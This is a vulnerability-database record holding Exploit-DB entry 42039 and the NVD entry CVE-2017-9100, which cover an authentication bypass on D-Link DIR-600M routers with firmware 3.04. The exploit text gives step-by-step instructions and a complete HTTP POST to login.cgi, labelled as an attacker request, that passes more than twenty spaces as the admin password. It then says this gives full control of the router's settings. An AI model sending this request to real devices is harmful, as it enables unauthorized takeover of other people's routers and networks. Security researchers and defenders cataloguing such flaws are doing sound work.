{"lastseen": "2017-05-21T04:50:17", "osvdbidlist": [], "references": [], "description": "D-Link DIR-600M Wireless N 150 - Authentication Bypass. Webapps exploit for Hardware platform. Tags: Credentials Bypass aka Admin Bypass AKA Auth Bypass (AB/CB)", "reporter": "Exploit-DB", "published": "2017-05-19T00:00:00", "type": "exploitdb", "title": "D-Link DIR-600M Wireless N 150 - Authentication Bypass", "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-05-21T04:50:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-9100"]}], "modified": "2017-05-21T04:50:17", "rev": 2}, "vulnersScore": 5.7}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9100"], "modified": "2017-05-19T00:00:00", "id": "EDB-ID:42039", "href": "https://www.exploit-db.com/exploits/42039/", "viewCount": 574, "sourceData": "# Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass\r

# Date: 19-05-2017\r

# Software Link: http://www.dlink.co.in/products/?pid=DIR-600M\r

# Exploit Author: Touhid M.Shaikh\r

# Vendor : www.dlink.com\r

# Contact : http://twitter.com/touhidshaikh22\r

# Version: Hardware version: C1\r

Firmware version: 3.04\r

# Tested on: All Platforms\r

\r

\r

1) Description\r

\r

After Successfully Connected to D-Link DIR-600M Wireless N 150\r

Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router's\r

Admin Panel Just by Feeding Blank Spaces in the password Field.\r

\r

It's More Dangerous when your Router has a public IP with remote login\r

enabled.\r

\r

For More Details : www.touhidshaikh.com/blog/\r

\r

IN MY CASE,\r

Router IP : http://192.168.100.1\r

\r

\r

\r

Video POC : https://www.youtube.com/watch?v=waIJKWCpyNQring\r

\r

2) Proof of Concept\r

\r

Step 1: Go to\r

Router Login Page : http://192.168.100.1/login.htm\r

\r

Step 2:\r

Fill username: admin\r

And in Password Fill more than 20 times Spaces(\" \")\r

\r

\r

\r

Our Request Looks like below.\r

-----------------ATTACKER REQUEST-----------------------------------\r

\r

POST /login.cgi HTTP/1.1\r

Host: 192.168.100.1\r

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101\r

Firefox/45.0\r

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r

Accept-Language: en-US,en;q=0.5\r

Accept-Encoding: gzip, deflate\r

Referer: http://192.168.100.1/login.htm\r

Cookie: SessionID=\r

Connection: close\r

Content-Type: application/x-www-form-urlencoded\r

Content-Length: 84\r

\r

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send\r

\r

\r

--------------------END here------------------------\r

\r

Bingooo You got admin Access on router.\r

Now you can download/upload settings, Change settings etc.\r

\r

\r

\r

\r

-------------------Greetz----------------\r

TheTouron(www.thetouron.in), Ronit Yadav\r

-----------------------------------------", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42039/"}

{"cve": [{"lastseen": "2019-05-29T18:17:11", "description": "login.cgi on D-Link DIR-600M devices with firmware 3.04 allows remote attackers to bypass authentication by entering more than 20 blank spaces in the password field during an admin login attempt.", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-21T04:29:00", "title": "CVE-2017-9100", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9100"], "modified": "2017-06-02T18:34:00", "cpe": ["cpe:/a:dlink:dir-600m_firmware:3.04"], "id": "CVE-2017-9100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9100", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}]}